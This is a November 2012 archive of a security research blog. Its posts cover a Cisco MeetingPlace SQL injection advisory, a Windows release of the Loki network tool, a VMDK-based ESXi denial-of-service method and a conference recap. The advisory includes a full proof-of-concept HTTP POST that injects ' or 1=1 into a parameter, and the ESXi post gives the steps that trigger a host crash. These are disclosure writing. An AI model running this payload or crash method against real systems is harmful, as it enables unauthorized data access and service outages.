Month: November 2012

Breaking
by Daniel Mende

SQL Injection in Cisco MeetingPlace

Cisco has released a security advisory for a vulnerability we discovered last year.
For comparison here is our original advisory to cisco:

Security Advisory for Cisco Unified Communications Solution
Release Date: 11/8/2012
Author: Daniel Mende
1 SUMMARY
Multiple critical SQL injections exist in Cisco unified meeting place.
2 AFFECTED PRODUCTS
The following Products have been tested as vulnerable so far:
Cisco Unified Meetingplace with the following modules:
• MeetingPlace Agent 7.1.1.9
• MeetingPlace Audio Service 7.1.1.8
• MeetingPlace Gateway SIM 7.1.1.2
• MeetingPlace Replication Service 7.1.1.9
• MeetingPlace Master Service 7.1.1.8
• MeetingPlace Extension 7.1.1.8
• MeetingPlace Authentication Filter 7.1.1.8
3 DETAILS
The following parameters are affected:
http://$IP/mpweb/scripts/mpx.dll [POST Parameter wcRecurMtgID]
4 VULNERABILITY SCORING
The severity rating based on CVSS Version 2:
Base Vector: (AV:N / AC:L / Au:S / C:P / I:P / A:P)
CVSS Version 2 Score: 6.5
Severity: Low
5 PROOF OF CONCEPT
POST /mpweb/scripts/mpx.dll HTTP/1.1
Host: 10.X.X.X
User-Agent: Mozilla/5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Proxy-Connection: keep-alive
Referer: http://10.X.X.X/mpweb/scripts/mpx.dll
Cookie: cookies=true
Content-Type: application/x-www-form-urlencoded
Content-Length: 571
SessionID=A40490A1-AB17-4C1E-BA4A-E3C5C90F62CA.1ED59E5C-A774-4546-8683-
AEB15D6FBD0D.55931857-6296-48ec-9434-3231c683c47d.ADadfjadlkeNmFhmplaihgkdDg
&wcMeetingID=&wcRecurMtgID=‘ or 1=1 —&URL0=wcBase.tpl&TXT0=Startseite&URL1=&
TXT1=&URL2=&TXT2=&URL3=&TXT3=&URL4=&TXT4=&URL5=&TXT5=&MtgCatToSearch=
%28all%2Bcategories%29&ML_PublicPosted=Yes&MtgIDToSearch=0000007&SchedulerID=
&wcRequest=&wcHash=&FormType=listmeetings&wcState=3&STPL=wcFindMtg.tpl&FTPL=
wcFindMtg.tpl&ML_List=MT_Today&ML_EndTime_Month=&ML_EndTime_Day=&ML_End
Time_Year=&ML_ShowContMtgs=Yes&SP_VLanguage=lang999i00

 

As we are at the topic of Cisco’s Unified Communications Solution, there is a lot more in the queue to come up, just be patient a little longer, it’ll be worth it (-;

 

cheers

/daniel

Continue reading
Breaking
by Daniel Mende

Loki for Windows released

Today is a great day, its the day, Loki finally runs on all big operating systems. Im proud to announce the first Loki release for Windows!

There are a few things not working (yet / at all) under Windows. Those are:

  • The WLCCP Module – ive not yet managed to build and link against asleap on windows [but time may help (-; ]
  • TCP-MD5 Auth for BGP – This will never work, as Windows has no TCP-MD5 impl. in the kernel
  • The MPLS Module – Had some hassle here with WinPcap, may be working in the future

The most testing so far was done on Windows 7 were all the other functions work as they do on Linux and Mac.

Download the installer here [1ebf2edbb0cdb631dc2704e82d9c2d778fac703d].

cheers

/daniel

Continue reading
Breaking
by Matthias Luft

VMDK Has Left the Building — Denial of Service

Almost all of our presentations and write-ups on the VMDK File Inclusion Vulnerability contained a slide stating something like

“we’re rather sure that DoS is possible as well ;-)”

including the following screenshot of the ESX purple screen of death:

So it seems like we still owe you that one — sorry for the delay! However the actual attack to trigger this purple screen was rather simple: Just include multiple VMDK raw files that cannot be aligned with 512 Byte blocks — e.g. several files of 512 * X + [0 < Y < 512] Bytes. Writing to a virtual hard drive composed of such single files for a short amount of time (typically one to three minutes, this is what we observed in our lab) triggered the purple screen on both ESXi4 and ESXi5 — at least for a patch level earlier than Releasebuild-515841/March 2012: it seems like this vulnerability was patched in Patch ESXi500-201203201-UG.

Enjoy,

Pascal & Matthias

Continue reading
Events
by Pascal Turbing

Back from DayCon VI

Two weeks ago we had a great time at Day-Con VI. Enno, Matthias, Rene, Frank and me traveled to Dayton, OH to give workshops and presentations. We started a tough week full of  workshops on Tuesday where Rene gave a deep inside look into the world of security on current mobile platforms. Matthias discussed security problems and possible design patterns of cloud environments in his Cloud & Virtualization Security Workshop before he gave a first insight into the world of reverse engineering on Wednesday. Frank and me taught the basics of hacking and pentesting in the PacketWars bootcamp (comparable to the one at TROOPERS), preparing the participants for the PacketWars on Saturday. Obviously we were not the only ones having a great time 😉

During the main conference day on Friday several talks about trust, gaining trust and measuring trustworthiness took place. As one could write books about the whole trust issue, Dr. Piotr Cofta did exactly this and hence was a perfect choice for the inspiring keynote on basic approaches to measure trust. As we also gave several talks throughout the day, you can find our material both on the Day-Con website and in our newsfeed.

We enjoyed our time in Dayton & see you there next year,
Pascal

Continue reading